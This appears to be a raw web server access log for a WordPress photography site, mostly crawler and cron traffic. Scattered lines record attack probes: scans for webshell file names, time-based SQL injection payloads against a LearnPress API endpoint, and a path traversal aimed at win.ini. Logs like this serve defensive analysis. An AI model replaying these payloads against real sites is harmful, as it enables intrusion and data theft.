202.56.2.88 - - [18/Oct/2025:16:00:37 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:00:44 -0400] "GET /products159629846?kg=0157683222 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:32 -0400] "GET /products155006982?kg=0153116734 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:35 -0400] "GET /products76594318?kg=0075660322 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
193.239.84.61 - - [18/Oct/2025:15:59:37 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
216.73.216.159 - - [18/Oct/2025:15:59:38 -0400] "GET /products76564466?kg=0075630836 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:59:53 -0400] "GET /progs/homepage HTTP/1.1" 301 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
66.249.64.106 - - [18/Oct/2025:16:00:07 -0400] "GET /products11700708?kg=0011558099 HTTP/1.1" 200 29188 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:00:08 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0"
216.73.216.159 - - [18/Oct/2025:16:00:02 -0400] "GET /products1524672?kg=0001506161 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:00:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760817615.5734689235687255859375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:00:11 -0400] "GET /products129185050?kg=0127609704 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:00:15 -0400] "GET /yanz.php HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:00:33 -0400] "GET /products11698074?kg=0011555496 HTTP/1.1" 200 31606 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:16:00:45 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fjs%2Fabout.php&reauth=1 HTTP/1.1" 200 2367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:01:08 -0400] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:01:08 -0400] "GET /products173238990?kg=0171126402 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:01:19 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:01:32 -0400] "GET /wp-content/plugins/seoo/wsoyanz1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:01:35 -0400] "GET /products45994452?kg=0045433627 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:00:53 -0400] "GET /products49958454?kg=0049349286 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:00:58 -0400] "GET /products11699386?kg=0011556792 HTTP/1.1" 200 29000 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:00:59 -0400] "GET /products159602008?kg=0157655725 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:01:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760817678.1732630729675292968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:01:14 -0400] "GET /products36359574?kg=0035916246 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:01:20 -0400] "GET /products76532896?kg=0075599649 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:01:27 -0400] "GET /products60882504?kg=0060140117 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:01:32 -0400] "GET /products100417118?kg=0099192602 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:01:44 -0400] "GET /products42066086?kg=0041553166 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:02:08 -0400] "GET /ajax-actions.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:02:14 -0400] "GET /products42074528?kg=0041561505 HTTP/1.1" 404 9796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:02:22 -0400] "GET /products1526302?kg=0001507770 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:02:33 -0400] "GET /wp-admin/ajax-actions.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:02:38 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fajax-actions.php&reauth=1 HTTP/1.1" 200 2367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:02:37 -0400] "GET /products119079138?kg=0117627036 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:02:49 -0400] "GET /api/v1/apikey?/api/v1/ping HTTP/1.1" 404 12366 "https://salhab360photos.com/document-stores" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.8"
216.73.216.159 - - [18/Oct/2025:16:02:52 -0400] "GET /products218216464?kg=0215555369 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:03:11 -0400] "GET /products158723264?kg=0156787697 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:01:47 -0400] "GET /cache-compat.php HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:01:50 -0400] "GET /products139501644?kg=0137800487 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:01:53 -0400] "GET /products119145066?kg=0117692160 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:02:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760817735.0680239200592041015625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
176.31.139.31 - - [18/Oct/2025:16:02:16 -0400] "GET /products158881592?kg=0156944093 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
3.8.127.128 - - [18/Oct/2025:16:02:26 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:16:02:26 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:16:02:28 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:02:29 -0400] "GET /products60898662?kg=0060156078 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:02:31 -0400] "GET /products9040988?kg=0008930815 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
196.240.60.201 - - [18/Oct/2025:16:02:38 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:02:43 -0400] "GET /products107611384?kg=0106299133 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:02:56 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:16:02:58 -0400] "GET /products155051882?kg=0153161088 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:03:00 -0400] "GET /wp-consar.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:03:09 -0400] "POST /index.php?action=porte_plume_previsu HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0"
185.61.153.107 - - [18/Oct/2025:16:03:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760817794.8713419437408447265625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:16:03:24 -0400] "GET /dropdown.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:04:03 -0400] "GET /adminfuns.php7 HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:04:26 -0400] "POST /wp-cron.php?doing_wp_cron=1760817866.4694709777832031250000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:16:03:34 -0400] "GET /products60916902?kg=0060174094 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:03:35 -0400] "GET /products107029730?kg=0105724572 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:03:35 -0400] "GET /wp-json/learnpress/v1/courses?course_filter&c_only_fields=post_title,(select(sleep(6))),ID HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:03:39 -0400] "GET /about.php7 HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:03:47 -0400] "GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
66.249.64.107 - - [18/Oct/2025:16:04:02 -0400] "GET /categories/12384498 HTTP/1.1" 200 29012 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
3.8.127.128 - - [18/Oct/2025:16:04:32 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
164.90.241.135 - - [18/Oct/2025:16:04:33 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
157.20.32.210 - - [18/Oct/2025:16:04:29 -0400] "POST /tracking/client_1/get-resource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
157.20.32.210 - - [18/Oct/2025:16:04:40 -0400] "POST /tracking/client_1/get-resource HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
157.20.32.210 - - [18/Oct/2025:16:04:43 -0400] "GET /ProcessPlus HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:04:50 -0400] "POST /tracking/client_1/read-instruction HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
216.73.216.159 - - [18/Oct/2025:16:04:53 -0400] "GET /products3396768?kg=0003355425 HTTP/1.1" 404 9797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:05:01 -0400] "GET /products11325640?kg=0011187605 HTTP/1.1" 200 29388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:05:07 -0400] "GET /products11866634?kg=0011722000 HTTP/1.1" 200 29415 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:16:05:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760817918.5674619674682617187500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:16:05:31 -0400] "GET /products234260388?kg=0231403635 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:16:05:35 -0400] "GET /alfa-rex2.php7 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:05:45 -0400] "GET /products19050928?kg=0018818681 HTTP/1.1" 200 29180 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:05:48 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:04:23 -0400] "GET /products32023542?kg=0031633094 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
46.101.70.221 - - [18/Oct/2025:16:04:33 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:16:04:33 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
202.56.2.88 - - [18/Oct/2025:16:04:28 -0400] "GET /ebs.php7 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:04:41 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:04:32 -0400] "GET /ProcessPlus HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:16:04:34 -0400] "GET /products60882494?kg=0060140106 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:04:51 -0400] "GET /ws.php7 HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:05:06 -0400] "GET /products1350340?kg=0001333955 HTTP/1.1" 200 29491 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:05:14 -0400] "GET /products13150130?kg=0012989844 HTTP/1.1" 200 29074 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:16:05:15 -0400] "GET /alfanew2.php7 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:05:31 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:05:39 -0400] "GET /products60909432?kg=0060166717 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:05:47 -0400] "GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/16.2 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:05:58 -0400] "GET /wp-admin/css/colors/sHQwacY.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
5.39.109.180 - - [18/Oct/2025:16:05:59 -0400] "GET /products146529404?kg=0144742543 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.64.105 - - [18/Oct/2025:16:06:09 -0400] "GET /products11867322?kg=0011722680 HTTP/1.1" 200 29423 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:16:06:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760817977.4677259922027587890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
162.243.84.218 - - [18/Oct/2025:16:06:12 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
162.243.84.218 - - [18/Oct/2025:16:06:18 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
202.56.2.88 - - [18/Oct/2025:16:06:23 -0400] "GET /wp-content/languages/wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:06:39 -0400] "GET /wp-admin/css/network.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:06:42 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fnetwork.php&reauth=1 HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:06:41 -0400] "GET /products60935398?kg=0060192366 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:16:06:58 -0400] "GET /wp-admin/css/dnIzIDf.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:07:01 -0400] "GET /products11865560?kg=0011720941 HTTP/1.1" 200 29443 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:07:03 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.4"
202.56.2.88 - - [18/Oct/2025:16:07:18 -0400] "GET /wp-admin/css/DRzylG.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:16:07:22 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2FDRzylG.php&reauth=1 HTTP/1.1" 200 2370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
